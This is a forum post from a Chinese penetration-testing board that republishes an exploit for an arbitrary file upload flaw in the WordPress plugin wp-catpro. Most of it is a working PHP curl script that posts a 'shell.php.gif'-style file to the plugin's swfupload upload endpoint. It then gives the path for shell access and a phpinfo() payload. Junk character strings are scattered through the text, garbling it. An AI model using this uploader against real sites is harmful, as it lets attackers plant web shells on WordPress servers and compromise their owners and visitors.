中国网络渗透测试联盟
标题:
WordPress插件wp-catpro任意文件上传
[打印本页]
作者:
admin
时间:
2013-2-27 20:12
标题:
WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
1 c( F9 o) d4 z! y
#-----------------------------------------------------------------------
( M% J$ X- E- E P5 B" C
+ e. e. n6 P5 A( F
作者 => Zikou-16
. p8 `1 D9 c% V2 t% h0 X
邮箱 =>
zikou16x@gmail.com
, G G- h2 [! K: A+ j, n
测试系统 : Windows 7 , Backtrack 5r3
8 ?7 H! X/ { S8 t# p/ V
下载地址 :
http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
5 K- b! B2 |2 E; I
####
, I/ \( ^2 Q( x6 q6 i3 i% T$ a( @
6 w6 J2 Z; q( m. ]+ Q) N2 ^5 \' d
#=> Exploit 信息:
, f, G/ h9 r/ Q% O h( [
------------------
, F9 q8 D! ]4 b2 C& X3 e
# 攻击者可以上传 file/shell.php.gif
- N8 s/ { T& z2 N
# ("jpg", "gif", "png") // Allowed file extensions
& n' |" P8 S3 J8 E% v; E
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
+ k/ V( a* y" \5 s& p
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 \ G4 R" n" Y
------------------
, |1 \2 U o2 q# R% w
; H1 Y d" ~$ t l! B6 O
#=> Exploit
3 c) B3 R: H: y8 \5 B
-----------
: _' h9 {. D# u( b) x1 _
<?php
" H2 ~% X: i# \& x% @5 l P: ^
/ m4 R4 r4 `; X3 D% u
$uploadfile="zik.php.gif";
/ ^/ [$ h* `0 ]7 @3 D6 X
$ch = curl_init("http://[
www.2cto.com
]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" V) Z0 x* z3 A$ F" d) a; h
curl_setopt($ch, CURLOPT_POST, true);
* m, w; k% M5 B, e
curl_setopt($ch, CURLOPT_POSTFIELDS,
z. K4 c9 L: U8 i! k" k
array('Filedata'=>"@$uploadfile",
! a/ h) C9 R& J" m" n/ M) r& w
'folder'=>'/wp-content/uploads/catpro/'));
, x- r5 U' B- E
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
; D# z0 E% ]% A8 O6 }
$postResult = curl_exec($ch);
0 ?+ D) `& t8 ?) I3 _
curl_close($ch);
9 H/ a6 ]& ]' Y) j# ~ @0 e
/ O2 H6 F, o J$ k
print "$postResult";
# l. t$ {. o0 e! b/ _
0 L k( ?" j' {7 z
Shell Access : http://[
www.xxx.com
]/[path]/wp-content/uploads/catpro/random_name.php.gif
" Q+ z7 R5 Y- K7 K, r4 n
?>
5 U! X' I" h2 v2 N/ K M+ d
<?php
( t) v; g% Y; Q
phpinfo();
( a" M2 Q; `' N4 K0 L0 c
?>
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2